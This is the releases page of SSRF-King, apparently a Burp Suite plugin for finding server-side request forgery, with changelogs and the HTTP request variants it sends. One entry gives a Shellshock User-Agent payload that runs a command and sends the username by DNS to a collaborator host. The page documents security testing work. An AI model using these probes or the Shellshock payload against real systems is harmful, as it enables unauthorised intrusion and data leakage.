Releases: ethicalhackingplayground/ssrf-king
Releases · ethicalhackingplayground/ssrf-king
SSRF-King v1.12
I have released v1.12 that has a small UI Design where you can specify your own call-back payload.
Changes:
- Implemented checkbox for http:// and https://
- Plugin now uses JDK 14 code compliance 9 which should work with all versions, let me know if it doesn't
Bug fixes:
-
Fixed parameter testing.
-
When it reported a X-Forwarded-Host it came up as X-Forwarded-For
-
The test cases for the following are now fixed and work.
GET http://burpcollab/some/endpoint HTTP/1.1
Host: example.com
...and
GET @burpcollab/some/endpoint HTTP/1.1
Host: example.com
...SSRF-King v1.1
I've implemented some more features.
- Detects SSRF in the User-Agent Header
- Detects SSRF in the Referer Header
- Detects SSRF in the X-Forwarded-For Header
- Detects SSRF in the Host Header
It tries different ways to find SSRF like.
GET http://burpcollab/some/endpoint HTTP/1.1
Host: example.com
...or
GET @burpcollab/some/endpoint HTTP/1.1
Host: example.com
...or
GET /some/endpoint HTTP/1.1
Host: example.com:80@burpcollab
...or changing the host header
GET /some/endpoint HTTP/1.1
Host: burpcollab
...or overriding the sites
GET /some/endpoint HTTP/1.1
Host: example.com
X-Forwarded-Host: burpcollab
...or referer
GET /some/endpoint HTTP/1.1
Host: example.com
Referer: burpcollab
...or blind SSRF with shellshock exploitation
GET /some/endpoint HTTP/1.1
Host: example.com
User-Agent: burpcollab
...Payload would be like: () { :; }; /usr/bin/nslookup $(whoami).YOUR-SUBDOMAIN-HERE.burpcollaborator.netReference:
https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
SSRF-King v1.0
This is the first release of SSRF-King. Please let me know if you have any issues.